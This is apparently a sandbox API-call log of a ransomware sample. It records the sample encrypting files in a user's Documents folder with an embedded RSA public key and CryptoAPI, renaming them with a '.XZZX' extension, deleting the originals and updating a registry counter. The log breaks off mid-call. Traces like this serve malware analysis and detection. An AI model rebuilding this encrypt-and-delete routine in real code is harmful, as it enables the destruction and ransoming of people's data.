SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0044.049] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.049] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0044.050] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0044.050] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4fc) returned 0x0 [0044.050] RegQueryValueExW (in: hKey=0x4fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x38, lpcbData=0x417dfdc*=0x4) returned 0x0 [0044.050] RegCloseKey (hKey=0x4fc) returned 0x0 [0044.050] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4fc) returned 0x0 [0044.050] RegSetValueExW (in: hKey=0x4fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x39, cbData=0x4 | out: lpData=0x417dfec*=0x39) returned 0x0 [0044.050] RegCloseKey (hKey=0x4fc) returned 0x0 [0044.050] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.051] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.051] CloseHandle (hObject=0x4e4) returned 1 [0044.052] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0044.053] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0044.053] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\zRPN8xkNuY7pBA7JA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zrpn8xknuy7pba7ja.csv")) returned 1 [0044.054] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\zRPN8xkNuY7pBA7JA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zrpn8xknuy7pba7ja.csv")) returned 0 Thread: id = 151 os_tid = 0x938 [0044.076] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.076] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.076] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.076] SetErrorMode (uMode=0x1) returned 0x1 [0044.076] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.076] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x45ac44d7, Data2=0x9df, Data3=0x42f5, Data4=([0]=0x8e, [1]=0xdc, [2]=0x6d, [3]=0x84, [4]=0x16, [5]=0x15, [6]=0x51, [7]=0x18))) returned 0x0 [0044.076] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0044.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.076] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned 91 [0044.076] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0044.076] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", dwFileAttributes=0x20) returned 1 [0044.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0044.077] ReadFile (in: hFile=0x4fc, lpBuffer=0x3de35d0, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3de35d0*, lpNumberOfBytesRead=0x417e418*=0xd8, lpOverlapped=0x0) returned 1 [0044.078] CloseHandle (hObject=0x4fc) returned 1 [0044.078] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0044.078] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0044.079] SetErrorMode (uMode=0x1) returned 0x1 [0044.079] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0044.079] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5318) returned 1 [0044.082] CryptGenKey (in: hProv=0x42d5318, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e53d0) returned 1 [0044.382] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.382] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.382] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.382] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0044.383] CryptDestroyKey (hKey=0x42e53d0) returned 1 [0044.383] CryptReleaseContext (hProv=0x42d5318, dwFlags=0x0) returned 1 [0044.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BF7B86490294F06B45AC44D706ACD4B3.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\bf7b86490294f06b45ac44d706acd4b3.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0044.384] WriteFile (in: hFile=0x50c, lpBuffer=0x3de35d0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3de35d0*, lpNumberOfBytesWritten=0x417e438*=0xd8, lpOverlapped=0x0) returned 1 [0044.385] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd8 [0044.385] WriteFile (in: hFile=0x50c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.385] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdd [0044.385] WriteFile (in: hFile=0x50c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0044.385] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0044.385] WriteFile (in: hFile=0x50c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.385] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf8 [0044.385] SetErrorMode (uMode=0x1) returned 0x1 [0044.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0044.385] OutputDebugStringW (lpOutputString="end") [0044.386] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0044.386] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0044.386] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5318) returned 1 [0044.386] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5318, dwCertEncodingType=0x1, pInfo=0x3e3fcb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fce0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fce8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5ad0) returned 1 [0044.386] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.387] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0044.387] CryptEncrypt (in: hKey=0x42e5ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0044.387] CryptEncrypt (in: hKey=0x42e5ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d53a0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d53a0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0044.387] WriteFile (in: hFile=0x50c, lpBuffer=0x42d53a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d53a0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0044.387] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0044.387] WriteFile (in: hFile=0x50c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.387] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0044.388] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0044.388] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x510) returned 0x0 [0044.388] RegQueryValueExW (in: hKey=0x510, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x39, lpcbData=0x417dfdc*=0x4) returned 0x0 [0044.388] RegCloseKey (hKey=0x510) returned 0x0 [0044.388] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x510) returned 0x0 [0044.388] RegSetValueExW (in: hKey=0x510, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3a, cbData=0x4 | out: lpData=0x417dfec*=0x3a) returned 0x0 [0044.388] RegCloseKey (hKey=0x510) returned 0x0 [0044.388] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.388] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.389] CloseHandle (hObject=0x50c) returned 1 [0044.389] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0044.390] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0044.390] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini")) returned 1 [0044.391] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini")) returned 0 Thread: id = 152 os_tid = 0x944 [0044.300] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.300] lstrcpyW (in: lpString1=0x42cf460, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0044.300] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.300] SetErrorMode (uMode=0x1) returned 0x1 [0044.300] lstrcpyW (in: lpString1=0x42cf860, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0044.300] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x1166911d, Data2=0x5095, Data3=0x402f, Data4=([0]=0x82, [1]=0xc, [2]=0x91, [3]=0xd6, [4]=0xe9, [5]=0xcc, [6]=0xfe, [7]=0xed))) returned 0x0 [0044.300] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0044.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.300] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\2E0B85E114340B5B1166911D1860EFA3.XZZX") returned 91 [0044.300] StrStrW (lpFirst="Favorites.vss", lpSrch="XZZX") returned 0x0 [0044.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x20) returned 1 [0044.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x508 [0044.347] CreateFileMappingW (hFile=0x508, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 Thread: id = 153 os_tid = 0x998 [0044.414] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.414] lstrcpyW (in: lpString1=0x417f460, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0044.414] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0044.414] SetErrorMode (uMode=0x1) returned 0x1 [0044.415] lstrcpyW (in: lpString1=0x417f860, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0044.415] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xfe94571, Data2=0x6e04, Data3=0x4b46, Data4=([0]=0x92, [1]=0xd7, [2]=0x19, [3]=0x55, [4]=0xdd, [5]=0x45, [6]=0x46, [7]=0x10))) returned 0x0 [0044.415] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0044.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.415] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\7B7BA3C4205941180FE9457124712560.XZZX") returned 100 [0044.415] StrStrW (lpFirst="folder.ico", lpSrch="XZZX") returned 0x0 [0044.415] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", dwFileAttributes=0x20) returned 1 [0044.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0044.416] ReadFile (in: hFile=0x510, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x74e6, lpOverlapped=0x0) returned 1 [0044.417] CloseHandle (hObject=0x510) returned 1 [0044.417] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0044.418] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0044.418] SetErrorMode (uMode=0x1) returned 0x1 [0044.418] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0044.418] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5428) returned 1 [0044.421] CryptGenKey (in: hProv=0x42d5428, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0044.535] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.536] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.536] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.536] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0044.536] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0044.536] CryptReleaseContext (hProv=0x42d5428, dwFlags=0x0) returned 1 [0044.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\7B7BA3C4205941180FE9457124712560.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\7b7ba3c4205941180fe9457124712560.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0044.537] WriteFile (in: hFile=0x510, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x74e6, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x74e6, lpOverlapped=0x0) returned 1 [0044.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x74e6 [0044.538] WriteFile (in: hFile=0x510, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x74eb [0044.538] WriteFile (in: 